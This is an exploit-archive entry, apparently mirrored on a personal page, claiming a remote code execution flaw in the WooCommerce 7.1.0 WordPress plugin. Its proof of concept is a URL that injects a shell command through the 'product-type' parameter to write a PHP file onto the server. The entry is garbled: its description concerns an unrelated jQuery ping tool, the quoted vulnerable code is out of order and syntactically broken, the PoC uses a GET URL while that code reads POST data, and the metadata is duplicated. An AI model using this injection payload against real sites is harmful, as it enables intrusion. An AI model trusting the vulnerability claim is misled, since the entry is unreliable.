WooCommerce v7.1.0 - Remote Code Execution(RCE)
Author: Milad karimi
type: webapps
platform: php
port:
date_added: 2023-03-31
date_updated: 2023-03-31
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51156.txt
type: webapps
platform: php
port:
date_added: 2023-03-31
date_updated: 2023-03-31
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51156.txt
# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE) # Date: 2022-12-07 # Author: Milad Karimi # Vendor Homepage: https://wordpress.org/plugins/woocommerce # Software Link: https://wordpress.org/plugins/woocommerce # Tested on: windows 10 , firefox # Version: 7.1.0 # CVE : N/A # Description: simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down. # PoC : http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php # Vulnerabile code: 95: $classname $classname($post_id); 94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); 92: ⇓ function save($post_id, $post) 93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); 92: ⇓ function save($post_id, $post)
Copyright © 2024 Irfan TOOR all rights reserved.